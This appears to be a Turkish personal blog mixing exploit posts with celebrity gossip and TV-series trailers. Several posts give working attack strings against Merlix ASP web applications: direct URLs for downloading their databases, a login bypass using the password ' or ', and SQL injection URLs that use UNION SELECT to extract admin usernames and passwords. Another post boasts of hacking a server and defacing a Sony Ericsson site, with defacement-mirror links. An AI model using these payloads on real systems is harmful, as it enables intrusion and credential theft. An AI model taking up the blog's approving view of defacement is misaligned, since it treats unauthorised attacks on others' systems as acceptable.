ASP AutoDealer Remote Database Disclosure Vulnerability

ASP AutoDealer Remote Database Disclosure Vulnerability

link: http://www.milw0rm.com/exploits/7360

Discovered By: ZoRLu

exp for demo: ( DD )

http://demo.merlix.com/autodealer/auto.mdb

ASPTicker 1.0 (news.mdb) Remote Database Disclosure Vulnerability

ASPTicker 1.0 (news.mdb) Remote Database Disclosure Vulnerability

link: http://www.milw0rm.com/exploits/7359

Discovered By: ZoRLu

exp for demo: ( DD )

http://demo.merlix.com/ticker/news.mdb

yeni şablonumla ilk yazımı yazayım :)

epeydir düşünüyodum temayı değiştirmeyi güzel bi tema buldum direk değiştim :) benim çok hoşuma gitti umarım sizlerde beğenirsiniz : )

Merlix Teamworx Server (DD/Bypass) Multiple Remote Vulns

Merlix Teamworx Server (DD/Bypass) Multiple Remote Vulns

link: http://www.milw0rm.com/exploits/7352

exp for demo: ( DD )

http://demo.merlix.com/teamworx/teamworx.mdb

exp for demo: ( Bypass )

http://demo.merlix.com/teamworx/default.asp

user: ZoRLu ( or dont write anything )

passwd: ' or '

Merlix Educate Servert (Bypass/DD) Multiple Remote Vulnerabilities

Merlix Educate Servert (Bypass/DD) Multiple Remote Vulnerabilities

link: http://www.milw0rm.com/exploits/7348

Discovered By: ZoRLu

exp for demo: ( Bypass )

http://demo.merlix.com/school/admin/config.asp

http://demo.merlix.com/school/admin/users.asp

exp for demo: ( DD )

http://demo.merlix.com/school/db/db.mdb

Beyaz'a büyük şok! Öyle bir ses çıktı ki...

msn yaşamda okuduğum bir haber ya bu beyaz bomba adam esprilere dikkat edin bomba :)


Muro'nun başrol oyuncularının konuk olduğu "Nası Yani"de Beyaz neden bir anda donup kaldı?.. İşte nedeni...



CNN Türk'te Meral Okay ve Beyazıt Öztürk'ün sunduğu "Nası Yani"ye "Muro: Nalet Olsun İçimdeki İnsan Sevgisine" filminin başrol oyuncuları konuk oldu.



Stüdyoda filmi değerlendiren konuklar ve Beyaz bir anda izleyicilerden gelen bir sesle adeta şok oldular



Canlı yayında donup kalan Beyaz, gözlerini stüdyodaki izleyicilere çevrirerek, "Ne oldu orada? Bişey oldu" derken, izleyiciler gülme krizine girdi.

Şaşkın bakışlar içinde ne olduğunu anlayan Beyaz, hiç bozuntuya vermeden "İzleyiciler çok rahat. Ne olduğunu çıkan sesten anladık. Tabi soda içersen öyle bir ses çıkar" diyerek, olayı aydınlattı.

Stüdyodaki konuklardan biri boş bulunmuş ve yayına kadar yansıyan şiddette "genirmiş"ti.

Tam Beyaz, konuklarına dönmüştü ki yine bir genirme sesi yükseldi yayında. Bunun üzerine şaşkınlığı bir kat daha artan Beyaz, "Bari koro halinde yapın" diyerek espiriyi patlattı.

kaynak: http://msnyasam.milliyet.com.tr/

Template Creature (SQL/DD) Multiple Remote Vulnerabilities

Template Creature (SQL/DD) Multiple Remote Vulnerabilities

link: http://www.milw0rm.com/exploits/7339

Discovered By: ZoRLu

exp for demo: ( DD )

http://demo.merlix.com/templatecreature/workDB/templatemonster.mdb

exp for demo: ( sql inj )

user: http://demo.merlix.com/templatecreature/media/media_level.asp?mcatid=999999+union+select+1,vcUserName,3+from+tb_adminUser

pass: http://demo.merlix.com/templatecreature/media/media_level.asp?mcatid=999999+union+select+1,vcPassword,3+from+tb_adminUser

Hatice Şendil

Hatice Şendil: polat abimizin(!) yeni yavuklusu yada beşik kertmesi yada yeni manitası vs. : ) her neyi olursa olsun hoş kız : ) Allah sahabısına bağışlasın ne diyelim : )

Kurtlar Vadisi Pusu 49. Bölüm Fragman

muro gidiyor : ) memati ile abdulheyde aralarında ekşın yaşıyolar : ) iyi bir bölüme benziyor

TIKLA iZLE

Sony Ericsson Hacked : )

gecenlerde bulduğum bir açıkla server a daldım server daki sitelerden biride Sony Ericsson sitesiydi :) açık str0ke tarafından yayınlanmadığı için bende yayınlamıycam :( kızdım a.q 16 açık gönderdim aynı anda yayınlamadı :D neymiş sebep artık o scriptlere ait acık yayınlamıycakmış çokta fifi :)

Sony Ericsson: http://sonycenter.co.in/

zone-h: http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8209313/

turk-h: http://turk-h.org/defacement/view/310853/sonycenter.co.in/

yildirimordulari.org

z0rlu.blogspot.com un pagerank ına baktım sıfır : D sonra aklıma gelmişken yildirimordulari.org un pagerank ına bi bakayım dedim site kapalı olmasına rağmen pagerank 2 ;)

http://www.pagerank.gen.tr/@pagerank/http://www.yildirimordulari.org

hay a.q

str0ke a 16 açık gönderdim yayınlamıyormuş artık o script acıklarını yayınlasa süper olacaktı : ) neyse can saolsun diyelim : )